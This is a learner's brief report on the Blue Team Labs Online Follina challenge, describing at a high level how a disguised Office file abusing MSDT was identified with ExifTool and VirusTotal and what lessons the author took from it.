Blue Team Labs Online - Follina

This is a my SOC report on Follina Challenge.

Overview

The challenge

On a Friday evening, the SOC team received an alert regarding a newly disclosed and actively exploited Remote Code Execution (RCE) vulnerability, known as Follina, leveraging the Microsoft Diagnostic Tool (MSDT).

A suspicious file named sample.doc was identified. Static analysis revealed that the file was not a genuine Word document, but rather a ZIP-based Office Open XML container, crafted to bypass macro security controls and trigger payload execution via MSDT and Dynamic Data Exchange (DDE) mechanisms.

The sample was flagged as malicious by 46 antivirus vendors, confirming active exploitation in the wild.

My process

My Analysis

I used ExifTool tool to detect that the file provided was spoofed (.doc masquerading), I hashed the file and perform OSINT on it using VirusTool. I found out that 46 vendors flagged as malicious.
During my analysis I found out that the XML structure invokes external HTML content, which subsequently executes payloads via MSDT, bypassing macro-based security checks. VirusTotal analyzied report shows that MITRE ATT&CK Mapping to Malware Behavior such as:

• Execution
• Persistence
• Privilege Escalation
• Defense Evasion
• Discovery
• Command and Control

What I learned

I have learnt not to trust all file extension until it is verify by confirming the file signature or using ExifTool to view the file metadata

Continued development

I will continue to take more challenges and practice until I become professional

Tools & Resources

• VirusTool
• ExifTool

Acknowledgments

To steven - MyDFIR

I wanted to sincerely thank you for volunteering your time to share your SOC analysis expertise with the public. Your training was exceptionally educative and provided practical skills that are immediately applicable.
I truly appreciate your generosity in providing such high-quality mentorship for free. This has add to my professional growth.

Full Report

For full challenge report, you can read the full report or downlown the full report on my-soc-report github account.